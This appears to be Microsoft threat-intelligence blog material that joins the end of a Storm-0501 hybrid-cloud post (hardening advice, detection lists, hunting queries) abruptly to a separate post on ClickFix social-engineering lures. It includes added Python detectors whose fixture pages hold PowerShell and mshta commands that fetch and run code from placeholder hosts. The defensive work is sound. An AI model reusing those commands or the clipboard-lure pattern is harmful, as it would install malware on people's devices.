Set a Conditional Access policy to limit the access of Microsoft Entra ID Directory Synchronization Accounts (DSA) from untrusted IP addresses to all cloud apps. Please refer to the advanced hunting section and check the relevant query to get those IP addresses.
For Entra Connect Sync servers using application-based authentication, use Conditional Access for workload identities to restrict the application’s service principal from similar unauthorized access.
Ensure separate user accounts and mail forwarding for Global Administrator accounts. Global Administrator (and other privileged groups) accounts should be cloud-native accounts with no ties to on-premises Active Directory. See other best practices for using Privileged roles here.
Ensure all existing privileged users already have a registered MFA method, to protect against malicious MFA registrations.
Ensure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the Microsoft Entra ID Directory Synchronization Account and all other users.
Enable protection to prevent bypassing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID. This enhances protection against federated domain attacks.
Set the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.
If only Microsoft Entra ID performs MFA for a federated domain, set federatedIdpMfaBehavior to rejectMfaByFederatedIdp to prevent bypassing MFA CAPs.
Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based Conditional Access policies to remediate risky sign-ins.
Protecting cloud resources
Use solutions like Microsoft Defender for Cloud to protect your cloud resources and assets from malicious activity, both in posture management, and threat detection capabilities.
Enable Microsoft Defender for Resource Manager as part of Defender for Cloud to automatically monitor the resource management operations in your organization. Defender for Resource Manager runs advanced security analytics to detect threats and alerts you about suspicious activity.
Enabling Defender for Resource Manager allows users to investigate Azure management operations within the Defender XDR, using the advanced hunting experience.
Utilize the Azure Monitor activity log to investigate and monitor Azure management events.
Utilize Azure policies for Azure Storage to prevent network and security misconfigurations and maximize the protection of business data stored in your storage accounts.
Enable Azure Monitor for Azure Blob Storage to collect, aggregate, and log data to enable recreation of activity trails for investigation purposes when a security incident occurs or network is compromised.
Enable Azure Blob backup to protect from accidental or malicious deletions of blobs or storage accounts.
Apply the principle of least privilege when authorizing access to blob data in Azure Storage using Microsoft Entra and RBAC and configure fine-grained Azure Blob Storage access for sensitive data access through Azure ABAC.
Enable purge protection in Azure Key Vaults to prevent immediate, irreversible deletion of vaults and secrets. Use the default retention interval of 90 days.
Enable logs in Azure Key Vault and retain them for up to a year to enable recreation of activity trails for investigation purposes when a security incident occurs or network is compromised.
Enable Microsoft Azure Backup for virtual machines to protect the data on your Microsoft Azure virtual machines, and to create recovery points that are stored in geo-redundant recovery vaults.
General hygiene recommendations
Utilize Microsoft Security Exposure Management, available in the Microsoft Defender portal, with capabilities such as critical asset protection and attack path analysis that enable security teams to proactively reduce exposure and mitigate the impact of Storm-0501 hybrid attack tactics. In this case, each of the critical assets involved – Entra Connect server, users with DCSync permissions, Global Administrators – can be identified by relevant alerts and recommendations.
Investigate on-premises and hybrid Microsoft Security Exposure Management attack paths. Security teams can use attack path analysis to trace cross-domain threats that exploit the critical Entra Connect server to pivot into cloud workloads, escalate privileges, and expand their reach. Teams can use the ‘Chokepoint’ view in the attack path dashboard in Microsoft Security Exposure Management to highlight entities appearing in multiple paths.
Utilize the Critical asset management capability in Microsoft Security Exposure Management by configuring your own custom queries to pinpoint your organization’s business-critical assets according to your needs, such as business-critical Azure Storage accounts.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic | Observed activity | Microsoft Defender coverage
Initial access
Observed activity:
– Suspicious sign-ins
Microsoft Defender XDR:
– Authentication with compromised credentials
– Compromised user account in a recognized attack pattern
– Malicious sign in from a risky IP address
– Malicious sign in from an IP address associated with recognized attacker infrastructure
– Malicious sign in from recognized attacker infrastructure
– Malicious sign-in from an unusual user agent
– Malicious sign-in from known threat actor IP address
– Successful authentication from a malicious IP
– Successful authentication from a suspicious IP
– Successful authentication using compromised credentials
– User compromised through session cookie hijack
– User signed in from a known malicious IP Address
– Suspicious Azure sign-in by user with active session on a device involved in a credential theft attempt
Microsoft Defender for Identity:
– Possibly compromised user account signed in
– Possibly compromised service principal account signed in
Microsoft Defender for Cloud Apps:
– Suspicious login from AADInternals tool
Microsoft Defender for Cloud (Defender for Resource Manager):
– Suspicious invocation of a high-risk ‘Initial Access’ operation detected (Preview)
Microsoft Defender for Cloud (Defender for Storage):
– Access from an unusual location to a storage account
– Access from an unusual location to a sensitive blob container
– Access from a known suspicious IP address to a sensitive blob container
– Access from a suspicious IP address
– Unusual unauthenticated public access to a sensitive blob container
Execution
Observed activity:
– Various types of execution-related suspicious activity by an attacker were observed
– Crafting access tokens and executing actions against the cloud
Microsoft Defender for Endpoint:
– Compromised account conducting hands-on-keyboard attack
– Potential human-operated malicious activity
– Suspicious cmdlets launch using AADInternals
Persistence
Observed activity:
– Federated domain backdoor was added
Microsoft Defender for Cloud Apps:
– Backdoor creation using AADInternals tool
Privilege escalation
Observed activity:
– Elevated access to Azure resources
– Assignment of Owner Azure role
Microsoft Defender XDR:
– Suspicious Azure elevate access operation by a user with an active session on a device involved in a credential theft attempt
– Possibly compromised Microsoft Entra Connect Sync account elevated its access to Azure resources
– Possibly compromised user elevated access to Azure resources
Microsoft Defender for Cloud (Defender for Resource Manager):
– Suspicious elevate access operation
– Suspicious invocation of a high-risk ‘Privilege Escalation’ operation detected (Preview)
– Suspicious Azure role assignment detected (Preview)
Defense evasion
Observed activity:
– Attempts to tamper with Microsoft Defender Antivirus
– Manipulation of Azure Storage account configurations
Microsoft Defender for Endpoint:
– Attempt to turn off Microsoft Defender Antivirus protection
Microsoft Defender for Cloud (Defender for Resource Manager):
– Suspicious invocation of a high-risk ‘Defense Evasion’ operation detected (Preview)
Credential access
Observed activity:
– Entra Connect Sync server compromise and sync accounts extraction
– Extracting credentials from remote machines
– Executing DCSync operation against a domain controller
– Access Azure Storage accounts access keys
– Creation of a key inside an Azure Key Vault for encryption of Azure Storage data
Microsoft Defender for Endpoint:
– Entra Connect Sync credentials extraction attempt
– Indication of local security authority secrets theft
– Potential Entra Connect Tampering
– Ongoing hands-on-keyboard attack using Impacket toolkit
– Possible source of DCSync attack
Microsoft Defender for Identity:
– Suspected DCSync attack (replication of directory services)
Microsoft Defender for Cloud Apps:
– Compromised Microsoft Entra ID Cloud Sync account
– AADInternals tool used by a Microsoft Entra Sync account
– Entra Connect Sync account suspicious activity following a suspicious login
– Suspicious sign-in to Microsoft Entra Connect Sync account
Microsoft Defender for Cloud (Defender for Resource Manager):
– Suspicious invocation of a high-risk ‘Credential Access’ operation detected (Preview)
Microsoft Defender for Cloud (Defender for Key Vault):
– Suspicious key vault recovery detected
– Unusual application accessed a key vault
– Unusual operation pattern in a key vault
– Unusual user accessed a key vault
Discovery
Observed activity:
– Verifying whether Microsoft Defender for Endpoint is onboarded on a machine
– Reconnaissance activity against Active Directory/Entra ID/Azure
– AzureHound tool invocation in the cloud environment
Microsoft Defender for Endpoint:
– Suspicious sequence of exploration activities
Microsoft Defender for Cloud Apps:
– Suspicious use of AzureHound
Microsoft Defender for Identity:
– Reconnaissance tool was observed
Microsoft Defender for Cloud (Defender for Resource Manager):
– AzureHound tool invocation detected
Lateral movement
Observed activity:
– Lateral movement between endpoints in the network
– Lateral movement using Evil-WinRM
– Cloud sign-in attempts using stolen credentials or access tokens extracted from compromised endpoints
Microsoft Defender for Endpoint:
– Possibly malicious use of proxy or tunneling tool
– Suspicious remote PowerShell execution
Microsoft Defender for Cloud Apps:
– Suspicious login from AADInternals tool
Exfiltration
Observed activity:
– Data collection and theft from Azure Storage accounts
Microsoft Defender for Cloud (Defender for Resource Manager):
– Suspicious invocation of a high-risk ‘Data Collection’ operation detected (Preview)
Microsoft Defender for Cloud (Defender for Storage):
– The access level of a potentially sensitive storage blob container was changed to allow unauthenticated public access
– Publicly accessible storage containers successfully discovered
– Publicly accessible storage containers unsuccessfully scanned
– Unusual amount of data extracted from a storage account
– Unusual deletion in a storage account
– Unusual amount of data extracted from a sensitive blob container
– Unusual number of blobs extracted from a sensitive blob container
– Unusual SAS token was used to access an Azure storage account from a public IP address
– Suspicious external access to an Azure storage account with overly permissive SAS token
– Suspicious external operation to an Azure storage account with overly permissive SAS token
– Access from a suspicious IP address
Impact
Observed activity:
– Mass Azure data store resources deletion and encryption
Microsoft Defender XDR:
– Suspicious Azure data store resources deletion attempt by a user with an active session on a device involved in a credential theft attempt
Microsoft Defender for Cloud (Defender for Resource Manager):
– Suspicious backup resource deletion (Preview)
– Suspicious invocation of a high-risk ‘Impact’ operation detected (Preview)
Microsoft Defender for Cloud (Defender for Storage):
– Unusual deletion in a storage account
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Sign-in activity
Explore sign-in activity from IdentityLogonEvents, look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are non-sync related:
IdentityLogonEvents
| where Timestamp > ago(30d)
| where AccountDisplayName contains "On-Premises Directory Synchronization Service Account"
| extend ApplicationName = tostring(RawEventData.ApplicationName)
| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName, OSPlatform, DeviceType
The activity of the sync account is typically repetitive, coming from the same IP address to the same application. Any deviation from the natural flow is worth investigating. Cloud applications that are usually accessed by the Microsoft Entra ID sync account are Microsoft Azure Active Directory Connect, Windows Azure Active Directory, and Microsoft Online Syndication Partner Portal.
Cloud activity
Explore the cloud activity (ActionType) of the sync account. As with sign-in activity, this account by nature performs a fixed set of actions, such as Update user. and Update device. New or uncommon activity from this account may indicate interactive use, which could be a legitimate action by someone in the organization or a malicious action by the threat actor.
CloudAppEvents
| where Timestamp > ago(30d)
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| extend Workload = RawEventData.Workload
| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType, OSPlatform, UserAgent, ISP
Pay close attention to actions from different DeviceType or OSPlatform values: this automated service runs from one specific machine, so there should be no variety in these fields.
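The two queries above describe a baseline-and-deviation check. The following Python is an added example, not code from the post, that implements that logic over constructed CloudAppEvents-style records: it learns the sync account's IP addresses, action types, applications, device type, OS platform and user agent over a learning period, then flags later records carrying any value never seen before, marking device, OS or user-agent changes as the interactive-use signal. All values, addresses and user agents are placeholders.

```python
"""Baseline the sync account's cloud activity and flag deviations from it.

Added example, not part of the original post. Records mirror a few
CloudAppEvents columns (Timestamp, IPAddress, ActionType, Application,
DeviceType, OSPlatform, UserAgent); every value is constructed.
"""
from datetime import datetime

FIELDS = ("IPAddress", "ActionType", "Application", "DeviceType", "OSPlatform", "UserAgent")
# A change in any of these points to a human or a tool rather than the sync service.
INTERACTIVE_FIELDS = {"DeviceType", "OSPlatform", "UserAgent"}


def _ts(rec):
    return datetime.fromisoformat(rec["Timestamp"])


def build_baseline(records, learn_until):
    """Values seen per field strictly before learn_until: the account's natural flow."""
    baseline = {f: set() for f in FIELDS}
    for rec in records:
        if _ts(rec) < learn_until:
            for f in FIELDS:
                baseline[f].add(rec[f])
    return baseline


def deviations(records, baseline, learn_until):
    """Records from learn_until onward with a value never seen in the baseline.

    Each finding lists the deviating fields and whether any of them indicate
    interactive use, which the post singles out as the signal to chase first."""
    out = []
    for rec in records:
        if _ts(rec) < learn_until:
            continue
        changed = [f for f in FIELDS if rec[f] not in baseline[f]]
        if changed:
            out.append({"Timestamp": rec["Timestamp"], "fields": changed,
                        "interactive": bool(INTERACTIVE_FIELDS & set(changed))})
    return out


def _rec(ts, ip, action, app="Windows Azure Active Directory", device="Other",
         os_platform="Windows", ua="Microsoft Azure AD Connect Sync"):
    return {"Timestamp": ts, "IPAddress": ip, "ActionType": action, "Application": app,
            "DeviceType": device, "OSPlatform": os_platform, "UserAgent": ua}


SYNC_IP = "10.10.5.21"
SAMPLE = [
    # Learning period: the sync server doing what it always does.
    _rec("2025-04-20T00:30:00", SYNC_IP, "Update user."),
    _rec("2025-04-21T00:30:00", SYNC_IP, "Update device."),
    _rec("2025-04-22T00:30:00", SYNC_IP, "Update user.", app="Microsoft Azure Active Directory Connect"),
    # Observation period.
    _rec("2025-05-10T00:30:00", SYNC_IP, "Update user."),                   # routine, not flagged
    _rec("2025-05-10T02:05:00", "203.0.113.7", "Update user.",             # new IP, OS and user agent
         os_platform="Linux", ua="python-requests/2.32"),
    _rec("2025-05-10T02:20:00", SYNC_IP, "Add member to role."),            # new action from the usual host
]
LEARN_UNTIL = datetime(2025, 5, 1)


def run_sample():
    return deviations(SAMPLE, build_baseline(SAMPLE, LEARN_UNTIL), LEARN_UNTIL)


if __name__ == "__main__":
    for d in run_sample():
        label = "INTERACTIVE" if d["interactive"] else "new-activity"
        print(d["Timestamp"], label, ", ".join(d["fields"]))
```

A new ActionType from the usual host and user agent is still worth a look, but the record that changes IP, OS platform and user agent at once is the one that resembles a stolen DSA credential being used from attacker tooling, and the example ranks it accordingly.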
Azure management events
Explore Azure management events by querying the new CloudAuditEvents table in advanced hunting in the Defender portal. The OperationName column indicates the type of control-plane event executed by the user.
Explore Microsoft Security Exposure Management capabilities by querying the ExposureGraphNodes and ExposureGraphEdges tables in the advanced hunting in the Defender portal. By utilizing these tables, you can identify critical assets, including Azure Storage accounts that contain sensitive data or protected by an immutable storage policy. All predefined criticality rules can be found here: Predefined classifications
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.
The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks. It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.
Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organizations could thus reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks). Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.
This blog discusses the different elements that make up a ClickFix campaign—from the arrival vectors it comes with to its various implementations—and provides different examples of threat campaigns we’ve observed to further illustrate these elements. We also provide recommendations and detection details to surface and mitigate this threat.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure—usually a landing page—and trick them into executing a malicious command themselves. By adding this user interaction element in the attack chain, a threat using the ClickFix technique could slip through conventional and automated security solutions.
Microsoft Threat Intelligence observed threat actors adapting and improving certain elements of the technique to further evade detection. For example, threat actors obfuscate the JavaScript that generates the visual lures or they download parts of the code from different servers. They also employ various tactics in obfuscating malicious commands. We discuss these stages of the attack chain in detail in the succeeding sections of this blog.
Once the user runs the malicious command, malware is downloaded to the target device. We’ve observed numerous threat actors that leverage ClickFix attacks to deliver the following:
Infostealers like LummaStealer, which appears to be the most prolific ClickFix final payload based on our observations and threat hunting investigations
Remote access tools (RATs) such as Xworm, AsyncRAT, NetSupport, and SectopRAT, which could allow threat actors to conduct hands-on keyboard activity like discovery, lateral movement, and persistence
Loaders like Latrodectus and MintsLoader, which could deliver additional malware and other payloads
Rootkits, such as a modified version of the open source r77, which could allow threat actors to employ several sophisticated persistence and defense evasion tactics and remain deeply embedded in a victim system
These final payloads are often “fileless”, that is, they’re seldom written to disk as a Windows executable (.exe or .dll) file. Instead, they’re loaded and launched in memory by living-off-the-land binaries (LOLBins), often as a .NET assembly or Common Language Runtime (CLR) module. However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.
Figure 1. The typical ClickFix attack chain
Case study: Lampion malware campaign
To illustrate a typical ClickFix attack chain, let’s look at a campaign we first identified in May 2025 targeting Portuguese organizations in the government, finance, and transportation sectors to deliver Lampion malware, an infostealer focused on banking information. The campaign has since been observed in several countries, including Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico, targeting organizations in the government, education, transportation, and financial services industries. As of June 2025, this campaign remains active.
The Lampion malware campaign’s ClickFix lures, obfuscation methods, and multi-stage infection process are designed to evade detection:
The threat actor sends phishing emails containing a ZIP file that, when opened, contains an HTML file redirecting target users to a fake Portuguese tax authority site where the ClickFix lure is hosted.
The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs).
The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.
This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.
The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.
After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.
However, during our investigation, the actual Lampion malware wasn’t delivered because the download command was commented out of the code.
Figure 2. Lampion infection chain
Before the click: Arrival vectors
Threat actors leveraging ClickFix rely on a variety of methods to lure unwitting users. We’ve observed three primary avenues where a user could encounter a ClickFix prompt: by receiving phishing emails, encountering a malicious ad, or by visiting a compromised or malicious website.
Phishing
Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607. These emails contained HTML attachments that attempted to install DarkGate, a commodity loader that is capable of keylogging, cryptocurrency mining, establishing C2 communications, and downloading additional malicious payloads, among others.
One of Storm-1607’s campaigns observed in May 2024 consisted of tens of thousands of emails targeting organizations in the United States (US) and Canada. These emails used payment and invoice lures and contained attachments with file names like reports_528647.html:
Figure 3. Storm-1607 phishing email
When opened, the HTML loaded a page with a fake Microsoft Word new document image and a dialog box showing an error message and prompting the user to click the How to fix button:
Figure 4. HTML attachment displaying a Microsoft Word background and ClickFix lure
Clicking the button copied the malicious code to the user’s clipboard in the background. Meanwhile, the dialog box added new instructions explaining how to open Windows Terminal and paste the malicious code into it:
Figure 5. ClickFix lure displaying further instructions
Other threat actors also use invoice or payment lures in their phishing campaigns, but as of this writing, HTML attachments are no longer the preferred way to deliver the ClickFix technique by email. Instead, threat actors now include in the phishing email a URL that points to a ClickFix landing page. For example, in March 2025, we observed a threat actor tracked as Storm-0426 launch a campaign of thousands of phishing emails that targeted users in Germany and attempted to install MintsLoader. The emails used payment and invoice lures purportedly from a web hosting provider and contained URLs leading to the Prometheus traffic direction system (TDS) hosted on numerous compromised sites:
Figure 6. Storm-0426 phishing email
The TDS redirected users to the attacker-controlled website mein-lonos-cloude[.]de, where the ClickFix lure instructed users to complete a human verification process by following the displayed instructions, which launched malicious code:
Figure 7. ClickFix landing page
Another example of a phishing campaign using URLs and redirectors was observed in June 2025, where the campaign impersonated the US Social Security Administration (SSA) and used a combination of social engineering and domain spoofing to deliver ScreenConnect, a legitimate remote management tool that has become increasingly abused by threat actors. Once installed, ScreenConnect could give an attacker full remote control over a victim’s system, enabling them to exfiltrate data, install additional malware, or conduct surveillance.
The campaign began with emails sent from a legitimate but compromised Brazilian domain. The message, which even included legitimate links to SSA’s official social media accounts in the footer, claimed that there was an issue with the recipient’s social security statement. As with other phishing emails, these characteristics and tactics were all attempts by the threat actor to bypass spam filters, lend credibility to the message, reduce suspicion, and prompt the user to take immediate action:
Figure 8. Phishing email impersonating the US SSA
The message’s call-to-action button, labeled Download Statement, was also particularly deceptive: instead of linking directly to a malicious site, it used a Google Ads URL redirect to obfuscate the final destination. This technique not only helped the email pass through conventional email security solutions, it also undermined a best practice that users are typically taught in security awareness training: hovering over a link before clicking to check whether the displayed URL points to the intended site.
When a user clicked the Download Statement button, they were redirected to a spoofed SSA website hosted on a Spanish top-level domain (access-ssa-gov[.]es). The site closely mimicked the real SSA home page, including a blurred background image of the legitimate site to create a false sense of familiarity and trust:
Figure 9. ClickFix landing page impersonating the US SSA
The landing page presented the user with a CAPTCHA human verification pop-up, which was part of the ClickFix technique. Behind the scenes, this interaction triggered a series of fake verification steps designed to guide the user into running a PowerShell script that would eventually download and launch the ScreenConnect payload:
Figure 10. ClickFix instructions from the spoofed US SSA domain
Malvertising
Malvertising is another popular delivery method that leads to ClickFix landing pages. In a campaign observed in April 2025, users who attempted to stream free or pirated movies on certain websites inadvertently launched a variety of scam pages in a new browser tab when they interacted with a movie (for example, by pressing the play button):
Figure 11. Example of a free movie streaming website
One of these scam pages was a ClickFix landing page that downloaded and installed Lumma Stealer:
Figure 12. ClickFix landing page the users were redirected to if they clicked the “Play” button on the free movie website
This activity cluster is notable because it gave the various intermediate HTA scripts media file extensions such as .mp3, .mp4, or .ogg. It’s also notable for its high traffic volumes: in a single day, tens of thousands, if not hundreds of thousands, of unique visitors could be funneled to scam pages (including the ClickFix landing page) through the malvertising redirectors.
Drive-by compromise
Some threat actors have also been observed to leverage compromised websites to deliver the ClickFix landing page. For example, the threat actor we track as Storm-0249 has traditionally used email to deliver Latrodectus or other initial access malware—whether by using PDF files or URL links (sometimes copyright infringement-themed). However, since the beginning of March 2025, Storm-0249 switched to compromising legitimate websites, potentially through WordPress vulnerabilities, and using the ClickFix technique to deliver its payloads.
When a user visits the compromised site, the original page is briefly displayed before it’s replaced with the ClickFix human verification lure. This specific lure even spoofs Cloudflare to further trick users into thinking that the verification step is legitimate:
Figure 13. ClickFix lure spoofing Cloudflare Turnstile on a compromised site
Inside the click: ClickFix implementations
ClickFix operators use several methods to attempt to convince a target to perform user-level command execution on their system. Early landing pages mimicked Google’s “Aw, Snap!” crash error or a Word Online “extension missing” message (as depicted in Figure 4), while recent ones spoof Google’s reCAPTCHA and Cloudflare’s Turnstile solution. We’ve even observed threat actors spoof social media platforms like Discord to trick users into believing they’re joining an actual Discord server. Many elements go into building ClickFix lure pages, from JavaScript inline frames (iframes) and HTML href attributes to cascading style sheets (CSS) resources, to make them look more legitimate.
There are various ways that ClickFix is implemented: some implementations are contained in one file or page, while others use remote resources. Some threat actors leave code comments amateurishly while others obfuscate their code. There are even implementations that report the status of an infection to a Telegram channel or a web server. We provide a few examples of these implementations and discuss their inner workings.
Impersonating Cloudflare Turnstile
Figure 14 shows a partial screenshot of a ClickFix landing page, binancepizza[.]info, displaying a seemingly legitimate Cloudflare Turnstile verification process that a user is lured to interact with before they can supposedly access the site:
Figure 14. The ClickFix landing page binancepizza[.]info
Its HTML source code clones this Cloudflare Turnstile style page using a href attribute to a CSS resource hosted by the Font Awesome library:
Figure 15. HTML code highlighting a CSS resource for a Cloudflare verification prompt
The page also references an HTML file (field.html) using a hidden iframe:
Figure 16. HTML code highlighting hidden iframe and text needing to “verify”
Within field.html, we see in Figure 17 that contentEl is the iframe element representing the fake Cloudflare Turnstile verification check box. When a user ticks the Verify you are human check box, this script animates a fake spinner through runVerification() and sends postMessage(“trigger”) to the parent window (the main landing page).
Figure 17. JavaScript code of iframe field.html, highlighting elements that send a trigger message upon verification click
The user is then presented with the ClickFix instructions (Figure 18), while the obfuscated command is copied to the user’s clipboard (Figure 19):
Figure 18. ClickFix instructions from binancepizza[.]info
Figure 19. Malicious command copied to clipboard
Figure 20 shows that the clipboard copy occurs once the code receives the message “trigger”, which is sent by the field.html hidden iframe. Once that message is received, the script uses navigator.clipboard.writeText(codeToCopy) to copy the command to the clipboard.
Figure 20. JavaScript code highlighting the method navigator.clipboard.writeText, which copies a malicious command to clipboard
Impersonating social platforms
It’s important to note that not all ClickFix landing pages are designed in the same manner and might not strictly contain the elements discussed previously. In some instances, threat actors also mimic popular social platforms to broaden their reach of potential targets.
Figure 21 shows a ClickFix landing page spoofing a Discord server supposedly needing to verify a user before they can join:
Figure 21. Fake Discord server landing page implementing ClickFix.
In this page’s source code (Figure 22), we can see it referencing the Discord logo image file to appear legitimate. Additionally, the addEventListener method waits for the Verify button to get clicked (through verifyBtn) so that navigator.clipboard.writeText(command) can copy the malicious command to the user’s clipboard. This JavaScript method is part of the Clipboard API, which gives a page access to the operating system (OS) clipboard. Older pages might use document.execCommand("copy"), which is now deprecated.
The fake Discord landing page differs from the previous example because the reference of an external trigger (from the hidden iframe) isn’t used here. Instead, the click then copy is all processed from the main window. Based on our analysis, this landing page also appears to be part of the OBSCURE#BAT campaign delivering r77 rootkit.
Figure 22. HTML code highlighting use of Discord logo and JavaScript elements that copy a malicious command to clipboard upon clicking “verify”
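To show how the two landing-page patterns above (the hidden-iframe postMessage trigger from binancepizza[.]info and the direct click-to-copy handler of the fake Discord page) can be recognized in saved page source, here is an added Python example; it is not code from the original post or from Microsoft. It parses three constructed HTML pages with the standard library, flags clipboard writes through navigator.clipboard.writeText or document.execCommand("copy"), hidden iframes paired with a message listener, verification wording and Run dialog instructions, and statically recovers the command that would land on the clipboard. The page markup, the 203.0.113.7 and example.invalid hosts, and the commands are constructed for the example; the Run dialog wording list is an assumption.

```python
import re
from html.parser import HTMLParser

# Markers from the two lure walk-throughs on the page; the Run-dialog wording is assumed.
CLIPBOARD_APIS = (r"navigator\.clipboard\.writeText\(",
                  r"document\.execCommand\(\s*['\"]copy['\"]\s*\)")
MESSAGE_TRIGGER = (r"postMessage\(\s*['\"]trigger['\"]", r"addEventListener\(\s*['\"]message['\"]")
RUN_INSTRUCTIONS = (r"win(?:dows)?\s*\+\s*r", r"ctrl\s*\+\s*v", r"run\s+(?:dialog|box|window)",
                    r"\bterminal\b", r"\bpowershell\b")
VERIFY_WORDING = ("verify you are human", "i am not a robot", "human verification", "captcha")
# writeText(<string literal>) or writeText(<identifier>); the identifier is resolved to its declaration.
WRITE_CALL = re.compile(r"writeText\(\s*(?:(['\"`])(?P<lit>.*?)\1|(?P<ident>[A-Za-z_$][\w$]*))\s*\)", re.S)


class LureParser(HTMLParser):
    """Collects script bodies, visible text and hidden iframes from a page."""

    def __init__(self):
        super().__init__()
        self.scripts, self.text, self.hidden_iframes = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            if "display:none" in style or "hidden" in a or a.get("width") == "0" or a.get("height") == "0":
                self.hidden_iframes.append(a.get("src") or "")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)


def extract_copied_command(js: str):
    """Recover the string handed to clipboard.writeText when it is a literal or a simple const/let/var."""
    m = WRITE_CALL.search(js)
    if not m:
        return None
    if m.group("lit") is not None:
        return m.group("lit")
    decl = re.search(rf"(?:const|let|var)\s+{re.escape(m.group('ident'))}\s*=\s*(['\"`])(.*?)\1", js, re.S)
    return decl.group(2) if decl else None


def scan_lure(html: str) -> dict:
    """Score one saved page for the ClickFix lure markers described above."""
    p = LureParser()
    p.feed(html)
    js = "".join(p.scripts)
    text = " ".join(p.text).lower()
    f = {
        "clipboard_write": any(re.search(r, js) for r in CLIPBOARD_APIS),
        "hidden_iframes": p.hidden_iframes,
        "iframe_trigger": bool(p.hidden_iframes) and any(re.search(r, js) for r in MESSAGE_TRIGGER),
        "run_instructions": any(re.search(r, text) for r in RUN_INSTRUCTIONS),
        "verification_lure": any(w in text for w in VERIFY_WORDING),
        "copied_command": extract_copied_command(js),
    }
    # A clipboard write alone is normal web behaviour (share buttons); the lure needs the social-engineering half too.
    f["verdict"] = f["clipboard_write"] and (f["run_instructions"] or f["verification_lure"])
    return f


# Constructed pages: a Turnstile-style lure, a Discord-style lure and a benign share button.
TURNSTILE_LURE = """<html><body><div class="cf-box"><span>Verify you are human</span>
<iframe src="field.html" style="display:none; width:0; height:0"></iframe></div>
<div id="steps" hidden>1. Press Win + R  2. Press Ctrl + V  3. Press Enter</div>
<script>
const codeToCopy = 'powershell -w hidden -c "iwr http://203.0.113.7/v.txt -useb | iex"';
window.addEventListener("message", (e) => {
  if (e.data === "trigger") { navigator.clipboard.writeText(codeToCopy); document.getElementById("steps").hidden = false; }
});
</script></body></html>"""
DISCORD_LURE = """<html><body><img src="discord-logo.png"><h1>Verify to join the server</h1>
<p>Complete the human verification: open the Run dialog (Windows + R), paste, press Enter.</p>
<button id="verifyBtn">Verify</button>
<script>
document.getElementById("verifyBtn").addEventListener("click", function () {
  navigator.clipboard.writeText("mshta https://example.invalid/captcha.mp4 # I am not a robot - Verification ID: 4402");
});
</script></body></html>"""
BENIGN_SHARE = """<html><body><h1>Share this article</h1><button id="copyBtn">Copy link</button>
<script>document.getElementById("copyBtn").addEventListener("click", () => navigator.clipboard.writeText(location.href));</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("turnstile", TURNSTILE_LURE), ("discord", DISCORD_LURE), ("benign", BENIGN_SHARE)):
        print(name, scan_lure(page))
```

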